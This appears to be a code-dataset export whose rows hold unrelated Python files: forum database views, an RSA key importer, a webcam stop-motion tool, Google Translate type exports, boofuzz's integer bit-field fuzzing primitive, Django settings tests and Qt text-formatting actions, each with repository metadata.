keys_values = zip(keys, cat)
return dict(keys_values)
def categories():
"""Return a dict containing all categories."""
cursor = db.con.cursor()
cursor.execute("SELECT id, title, description, slug FROM bulbs_category")
cats = cursor.fetchall()
data = map(catinfo, cats)
return data
def subcatinfo(data):
keys = "id", "title", "category_id", "desc", "slug"
keys_values = zip(keys, data)
id = data[0]
return dict(keys_values,
id=id,
threads=number_of_threads(id),
posts=number_of_posts(id),
last_post=last_post(id)
)
def subcategories(cat_id=None):
"""Return a dict containing information from a specified category or forums for every category."""
cursor = db.con.cursor()
if cat_id is not None:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory \
WHERE category_id = %s", (cat_id, ))
else:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory")
children = cursor.fetchall()
subcategories_ = map(subcatinfo, children)
return subcategories_
@view_config(route_name="home", renderer="home.mako")
def response(request):
cursor = db.con.cursor()
cats = categories()
subcats = list(subcategories())
cursor.execute("SELECT username FROM bulbs_user ORDER BY date DESC LIMIT 1")
newest_user = cursor.fetchone()[0]
return {
"project": request.registry.settings.get("site_name"),
"title": "Home",
"categories": cats,
"subcategories": subcats,
"new_member": newest_user
}
| mit | -4,394,526,757,759,784,400 | 32.034483 | 102 | 0.634134 | false |
repotvsupertuga/tvsupertuga.repository | script.module.cryptolib/lib/Crypto/PublicKey/RSA.py | 1 | 2753 | #!/usr/bin/env python
from __future__ import absolute_import
import binascii
import struct
from rsa import PublicKey, PrivateKey
from Crypto.Math.Numbers import Integer
def import_key(extern_key, passphrase=None):
"""Import an RSA key (public or private half), encoded in standard
form.
:Parameter extern_key:
The RSA key to import, encoded as a byte string.
An RSA public key can be in any of the following formats:
- X.509 certificate (binary or PEM format)
- X.509 ``subjectPublicKeyInfo`` DER SEQUENCE (binary or PEM
encoding)
- `PKCS#1`_ ``RSAPublicKey`` DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
An RSA private key can be in any of the following formats:
- PKCS#1 ``RSAPrivateKey`` DER SEQUENCE (binary or PEM encoding)
- `PKCS#8`_ ``PrivateKeyInfo`` or ``EncryptedPrivateKeyInfo``
DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
For details about the PEM encoding, see `RFC1421`_/`RFC1423`_.
The private key may be encrypted by means of a certain pass phrase
either at the PEM level or at the PKCS#8 level.
:Type extern_key: string
:Parameter passphrase:
In case of an encrypted private key, this is the pass phrase from
which the decryption key is derived.
:Type passphrase: string
:Return: An RSA key object (`RsaKey`).
:Raise ValueError/IndexError/TypeError:
When the given key cannot be parsed (possibly because the pass
phrase is wrong).
.. _RFC1421: http://www.ietf.org/rfc/rfc1421.txt
.. _RFC1423: http://www.ietf.org/rfc/rfc1423.txt
.. _`PKCS#1`: http://www.ietf.org/rfc/rfc3447.txt
.. _`PKCS#8`: http://www.ietf.org/rfc/rfc5208.txt
"""
if passphrase is not None:
raise ValueError("RSA key passphrase is not supported")
if extern_key.startswith('ssh-rsa '):
# This is probably an OpenSSH key
keystring = binascii.a2b_base64(extern_key.split(' ')[1])
keyparts = []
while len(keystring) > 4:
l = struct.unpack(">I", keystring[:4])[0]
keyparts.append(keystring[4:4 + l])
keystring = keystring[4 + l:]
e = Integer.from_bytes(keyparts[1])
n = Integer.from_bytes(keyparts[2])
return PublicKey(n._value, e._value)
for fmt in ("PEM", "DER"):
try:
return PrivateKey.load_pkcs1(extern_key, fmt)
except:
try:
return PublicKey.load_pkcs1(extern_key, fmt)
except:
pass
raise ValueError("RSA key format is not supported")
# Backward compatibility
importKey = import_key
| gpl-2.0 | 2,940,562,159,866,837,000 | 33.848101 | 74 | 0.631311 | false |
fatcloud/PyCV-time | experiments/stop_motion_tool/stop_motion_tool.py | 1 | 1533 | from cam import OpenCV_Cam
import cv2
import os.path
import time
cam = OpenCV_Cam(0)
cam.size = (1920, 1080)
KEY_ESC = 27
KEY_SPACE = ord(' ')
PAGE_DOWN = 2228224 # This make the stop motion to be controllable by presenter.
prevFrame = None
i = 0
#Make a directory on current working directory with date and time as its name
timestr = time.strftime("%Y%m%d-%H%M%S")
cwd = os.getcwd()
dirName = cwd + "\\"+timestr
os.makedirs(dirName)
fname= cwd + "\\frame_.png"
if os.path.isfile(fname):
prevFrame = cv2.imread(fname)
#Make .avi file from collected frames
fourcc = cv2.cv.CV_FOURCC(*'XVID')
video = cv2.VideoWriter(dirName+"\\"+'output_.avi',fourcc, 3.0, cam.size, isColor =True)
while True:
# Capture frame-by-frame
frame = cam.read()
# image processing functions
# Load the frame into a window named as 'Press any key to exit'
if (prevFrame is not None):
showFrame = cv2.addWeighted(frame,0.7,prevFrame,0.3,0)
else:
showFrame = frame
resizeShowFrame = cv2.resize(showFrame, (0,0), fx = 0.5, fy = 0.5 )
cv2.imshow('Press ESC to exit', resizeShowFrame)
# wait for the key
key_code = cv2.waitKey(10)
if key_code is KEY_SPACE or key_code == PAGE_DOWN:
cv2.imwrite(dirName+"\\"+'frame'+str(i)+'_.png', frame)
video.write(frame)
prevFrame = frame
i += 1
elif key_code is KEY_ESC:
cv2.imwrite(cwd + '\\frame_.png', prevFrame)
break
cv2.destroyAllWindows()
cam.release()
video.release()
| mit | 5,548,077,770,134,502,000 | 24.131148 | 88 | 0.641879 | false |
googleapis/googleapis-gen | google/cloud/translate/v3beta1/translation-v3beta1-py/google/cloud/translate_v3beta1/types/__init__.py | 1 | 2684 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .translation_service import (
BatchDocumentInputConfig,
BatchDocumentOutputConfig,
BatchTranslateDocumentMetadata,
BatchTranslateDocumentRequest,
BatchTranslateDocumentResponse,
BatchTranslateMetadata,
BatchTranslateResponse,
BatchTranslateTextRequest,
CreateGlossaryMetadata,
CreateGlossaryRequest,
DeleteGlossaryMetadata,
DeleteGlossaryRequest,
DeleteGlossaryResponse,
DetectedLanguage,
DetectLanguageRequest,
DetectLanguageResponse,
DocumentInputConfig,
DocumentOutputConfig,
DocumentTranslation,
GcsDestination,
GcsSource,
GetGlossaryRequest,
GetSupportedLanguagesRequest,
Glossary,
GlossaryInputConfig,
InputConfig,
ListGlossariesRequest,
ListGlossariesResponse,
OutputConfig,
SupportedLanguage,
SupportedLanguages,
TranslateDocumentRequest,
TranslateDocumentResponse,
TranslateTextGlossaryConfig,
TranslateTextRequest,
TranslateTextResponse,
Translation,
)
__all__ = (
'BatchDocumentInputConfig',
'BatchDocumentOutputConfig',
'BatchTranslateDocumentMetadata',
'BatchTranslateDocumentRequest',
'BatchTranslateDocumentResponse',
'BatchTranslateMetadata',
'BatchTranslateResponse',
'BatchTranslateTextRequest',
'CreateGlossaryMetadata',
'CreateGlossaryRequest',
'DeleteGlossaryMetadata',
'DeleteGlossaryRequest',
'DeleteGlossaryResponse',
'DetectedLanguage',
'DetectLanguageRequest',
'DetectLanguageResponse',
'DocumentInputConfig',
'DocumentOutputConfig',
'DocumentTranslation',
'GcsDestination',
'GcsSource',
'GetGlossaryRequest',
'GetSupportedLanguagesRequest',
'Glossary',
'GlossaryInputConfig',
'InputConfig',
'ListGlossariesRequest',
'ListGlossariesResponse',
'OutputConfig',
'SupportedLanguage',
'SupportedLanguages',
'TranslateDocumentRequest',
'TranslateDocumentResponse',
'TranslateTextGlossaryConfig',
'TranslateTextRequest',
'TranslateTextResponse',
'Translation',
)
| apache-2.0 | -8,703,619,056,856,148,000 | 27.553191 | 74 | 0.742548 | false |
jtpereyda/boofuzz | boofuzz/primitives/bit_field.py | 1 | 6982 | import struct
from builtins import range
import six
from past.builtins import map
from .. import helpers
from ..constants import LITTLE_ENDIAN
from ..fuzzable import Fuzzable
def binary_string_to_int(binary):
"""
Convert a binary string to a decimal number.
@type binary: str
@param binary: Binary string
@rtype: int
@return: Converted bit string
"""
return int(binary, 2)
def int_to_binary_string(number, bit_width):
"""
Convert a number to a binary string.
@type number: int
@param number: (Optional, def=self._value) Number to convert
@type bit_width: int
@param bit_width: (Optional, def=self.width) Width of bit string
@rtype: str
@return: Bit string
"""
return "".join(map(lambda x: str((number >> x) & 1), range(bit_width - 1, -1, -1)))
class BitField(Fuzzable):
"""
The bit field primitive represents a number of variable length and is used to define all other integer types.
:type name: str, optional
:param name: Name, for referencing later. Names should always be provided, but if not, a default name will be given,
defaults to None
:type default_value: int, optional
:param default_value: Default integer value, defaults to 0
:type width: int, optional
:param width: Width in bits, defaults to 8
:type max_num: int, optional
:param max_num: Maximum number to iterate up to, defaults to None
:type endian: char, optional
:param endian: Endianness of the bit field (LITTLE_ENDIAN: <, BIG_ENDIAN: >), defaults to LITTLE_ENDIAN
:type output_format: str, optional
:param output_format: Output format, "binary" or "ascii", defaults to binary
:type signed: bool, optional
:param signed: Make size signed vs. unsigned (applicable only with format="ascii"), defaults to False
:type full_range: bool, optional
:param full_range: If enabled the field mutates through *all* possible values, defaults to False
:type fuzz_values: list, optional
:param fuzz_values: List of custom fuzz values to add to the normal mutations, defaults to None
:type fuzzable: bool, optional
:param fuzzable: Enable/disable fuzzing of this primitive, defaults to true
"""
def __init__(
self,
name=None,
default_value=0,
width=8,
max_num=None,
endian=LITTLE_ENDIAN,
output_format="binary",
signed=False,
full_range=False,
*args,
**kwargs
):
super(BitField, self).__init__(name=name, default_value=default_value, *args, **kwargs)
assert isinstance(width, six.integer_types), "width must be an integer!"
self.width = width
self.max_num = max_num
self.endian = endian
self.format = output_format
self.signed = signed
self.full_range = full_range
if not self.max_num:
self.max_num = binary_string_to_int("1" + "0" * width)
assert isinstance(self.max_num, six.integer_types), "max_num must be an integer!"
def _iterate_fuzz_lib(self):
if self.full_range:
for i in range(0, self.max_num):
yield i
else:
# try only "smart" values.
interesting_boundaries = [
0,
self.max_num // 2,
self.max_num // 3,
self.max_num // 4,
self.max_num // 8,
self.max_num // 16,
self.max_num // 32,
self.max_num,
]
for boundary in interesting_boundaries:
for v in self._yield_integer_boundaries(boundary):
yield v
# TODO Add a way to inject a list of fuzz values
# elif isinstance(default_value, (list, tuple)):
# for val in iter(default_value):
# yield val
# TODO: Add injectable arbitrary bit fields
def _yield_integer_boundaries(self, integer):
"""
Add the supplied integer and border cases to the integer fuzz heuristics library.
@type integer: int
@param integer: int to append to fuzz heuristics
"""
for i in range(-10, 10):
case = integer + i
if 0 <= case < self.max_num:
# some day: if case not in self._user_provided_values
yield case
def encode(self, value, mutation_context):
temp = self._render_int(
value, output_format=self.format, bit_width=self.width, endian=self.endian, signed=self.signed
)
return helpers.str_to_bytes(temp)
def mutations(self, default_value):
for val in self._iterate_fuzz_lib():
yield val
@staticmethod
def _render_int(value, output_format, bit_width, endian, signed):
"""
Convert value to a bit or byte string.
Args:
value (int): Value to convert to a byte string.
output_format (str): "binary" or "ascii"
bit_width (int): Width of output in bits.
endian: BIG_ENDIAN or LITTLE_ENDIAN
signed (bool):
Returns:
str: value converted to a byte string
"""
if output_format == "binary":
bit_stream = ""
rendered = b""
# pad the bit stream to the next byte boundary.
if bit_width % 8 == 0:
bit_stream += int_to_binary_string(value, bit_width)
else:
bit_stream = "0" * (8 - (bit_width % 8))
bit_stream += int_to_binary_string(value, bit_width)
# convert the bit stream from a string of bits into raw bytes.
for i in range(len(bit_stream) // 8):
chunk_min = 8 * i
chunk_max = chunk_min + 8
chunk = bit_stream[chunk_min:chunk_max]
rendered += struct.pack("B", binary_string_to_int(chunk))
# if necessary, convert the endianness of the raw bytes.
if endian == LITTLE_ENDIAN:
# reverse the bytes
rendered = rendered[::-1]
_rendered = rendered
else:
# Otherwise we have ascii/something else
# if the sign flag is raised and we are dealing with a signed integer (first bit is 1).
if signed and int_to_binary_string(value, bit_width)[0] == "1":
max_num = binary_string_to_int("1" + "0" * (bit_width - 1))
# chop off the sign bit.
val = value & binary_string_to_int("1" * (bit_width - 1))
# account for the fact that the negative scale works backwards.
val = max_num - val - 1
# toss in the negative sign.
_rendered = "%d" % ~val
# unsigned integer or positive signed integer.
else:
_rendered = "%d" % value
return _rendered
| gpl-2.0 | 3,794,698,004,206,549,500 | 33.564356 | 120 | 0.574048 | false |
ubyssey/dispatch | dispatch/tests/test_core.py | 1 | 1743 | from django.test import TestCase
from dispatch.modules.integrations import BaseIntegration
class IntegrationTestCase(TestCase):
class TestIntegration(BaseIntegration):
ID = 'test-integration'
HIDDEN_FIELDS = [
'setting_d'
]
def test_integration_returns_empty_settings(self):
self.assertEqual(self.TestIntegration.get_settings(), {})
def test_integration_adds_new_settings(self):
self.TestIntegration.update_settings({'setting_a': 'a', 'setting_b': 'b'})
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_a'], 'a')
self.assertEqual(settings['setting_b'], 'b')
def test_integration_updates_existing_setting(self):
# Set setting_a to 1
self.TestIntegration.update_settings({'setting_a': '1'})
# Verify that setting_a has been saved as 1
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_a'], '1')
# Update setting_a to 2
self.TestIntegration.update_settings({'setting_a': '2'})
# Verify that setting_a has been updated to 2
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_a'], '2')
def test_integration_hidden_settings(self):
self.TestIntegration.update_settings({'setting_c': 'c', 'setting_d': 'd'})
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_c'], 'c')
self.assertEqual('setting_d' in settings, False)
settings = self.TestIntegration.get_settings(show_hidden=True)
self.assertEqual(settings['setting_c'], 'c')
self.assertEqual(settings['setting_d'], 'd')
| gpl-2.0 | -5,843,173,825,848,535,000 | 30.690909 | 82 | 0.653471 | false |
mtils/ems | ems/qt/richtext/char_format_actions.py | 1 | 6238 |
from ems.qt import QtWidgets, QtCore, QtGui
from ems.qt.richtext.char_format_proxy import CharFormatProxy
Qt = QtCore.Qt
QObject = QtCore.QObject
QColor = QtGui.QColor
QAction = QtWidgets.QAction
QKeySequence = QtGui.QKeySequence
QFont = QtGui.QFont
QIcon = QtGui.QIcon
QPixmap = QtGui.QPixmap
ThemeIcon = QIcon.fromTheme
QApplication = QtWidgets.QApplication
QColorDialog = QtWidgets.QColorDialog
QFontComboBox = QtWidgets.QFontComboBox
QComboBox = QtWidgets.QComboBox
QFontDatabase = QtGui.QFontDatabase
QTextDocument = QtGui.QTextDocument
QTextCharFormat = QtGui.QTextCharFormat
pyqtSignal = QtCore.pyqtSignal
pyqtSlot = QtCore.pyqtSlot
pyqtProperty = QtCore.pyqtProperty
class CharFormatActions(QObject):
documentChanged = pyqtSignal(QTextDocument)
currentBlockFormatChanged = pyqtSignal(QTextCharFormat)
def __init__(self, parentWidget, signalProxy=None, resourcePath=':/text-editor'):
super(CharFormatActions, self).__init__(parentWidget)
self.resourcePath = resourcePath
self.actions = []
self.widgets = []
self.signals = CharFormatProxy(self) if signalProxy is None else signalProxy
self._addActions(self.parent())
self._document = QTextDocument()
self._lastBlockFormat = None
def getDocument(self):
return self._document
@pyqtSlot(QTextDocument)
def setDocument(self, document):
if self._document is document:
return
if self._document:
self._disconnectFromDocument(self._document)
self._document = document
self.documentChanged.emit(self._document)
document = pyqtProperty(QTextDocument, getDocument, setDocument)
def _disconnectFromDocument(self, document):
return
def _addActions(self, parent):
self.actionTextBold = QAction(
ThemeIcon('format-text-bold', self._icon('bold.png')),
"&Bold", parent, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_B,
triggered=self.signals.setBold, checkable=True)
bold = QFont()
bold.setBold(True)
self.actionTextBold.setFont(bold)
self.signals.boldChanged.connect(self.actionTextBold.setChecked)
self.actions.append(self.actionTextBold)
self.actionTextItalic = QAction(
ThemeIcon('format-text-italic', self._icon('italic.png')),
"&Italic", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_I,
triggered=self.signals.setItalic, checkable=True)
italic = QFont()
italic.setItalic(True)
self.actionTextItalic.setFont(italic)
self.signals.italicChanged.connect(self.actionTextItalic.setChecked)
self.actions.append(self.actionTextItalic)
self.actionTextUnderline = QAction(
ThemeIcon('format-text-underline', self._icon('underline.png')),
"&Underline", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_U,
triggered=self.signals.setUnderline, checkable=True)
underline = QFont()
underline.setUnderline(True)
self.actionTextUnderline.setFont(underline)
self.actions.append(self.actionTextUnderline)
self.signals.underlineChanged.connect(self.actionTextUnderline.setChecked)
pix = QPixmap(16, 16)
pix.fill(Qt.black)
self.actionTextColor = QAction(QIcon(pix), "&Color...",
self, triggered=self._textColor)
self.signals.foregroundColorChanged.connect(self._colorChanged)
self.actions.append(self.actionTextColor)
self.actionClearFormat = QAction(ThemeIcon('format-text-clear', self._icon('magic.png')),
"&Remove Format", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_E,
triggered=self.signals.clearFormat)
self.actions.append(self.actionClearFormat)
self.fontCombo = QFontComboBox()
self.fontCombo.activated[str].connect(self.signals.setFontFamily)
self.signals.fontFamilyChanged.connect(self.setFontFamily)
self.widgets.append(self.fontCombo)
self.sizeCombo = QComboBox()
self.sizeCombo.setObjectName("sizeCombo")
self.sizeCombo.setEditable(True)
self.signals.pointSizeChanged.connect(self.setFontPointSize)
self.widgets.append(self.sizeCombo)
db = QFontDatabase()
for size in db.standardSizes():
self.sizeCombo.addItem("{}".format(size))
self.sizeCombo.activated[str].connect(self._textSize)
self.sizeCombo.setCurrentIndex(
self.sizeCombo.findText(
"{}".format(QApplication.font().pointSize())
)
)
def _textColor(self):
color = self.signals.getForegroundColor()
if not color:
color = QColor(0,0,0)
col = QColorDialog.getColor(color, self.parent())
if not col.isValid():
return
self.signals.setForegroundColor(col)
def _colorChanged(self, color):
pix = QPixmap(16, 16)
pix.fill(color)
self.actionTextColor.setIcon(QIcon(pix))
def _textSize(self, pointSize):
pointSize = float(pointSize)
if pointSize < 0:
return
self.signals.setPointSize(pointSize)
def addToToolbar(self, toolbar, addActions=True, addWidgets=True):
if addActions:
for action in self.actions:
toolbar.addAction(action)
if not addWidgets:
return
for widget in self.widgets:
widget.setParent(toolbar)
toolbar.addWidget(widget)
def setFontFamily(self, family):
self.fontCombo.setCurrentIndex(self.fontCombo.findText(family))
def setFontPointSize(self, pointSize):
self.sizeCombo.setCurrentIndex(self.sizeCombo.findText("{}".format(int(pointSize))))
def iconPath(self, fileName):
return self.resourcePath + '/' + fileName
def _icon(self, fileName):
return QIcon(self.iconPath(fileName)) | mit | 4,689,382,300,073,918,000 | 32.543011 | 97 | 0.648124 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.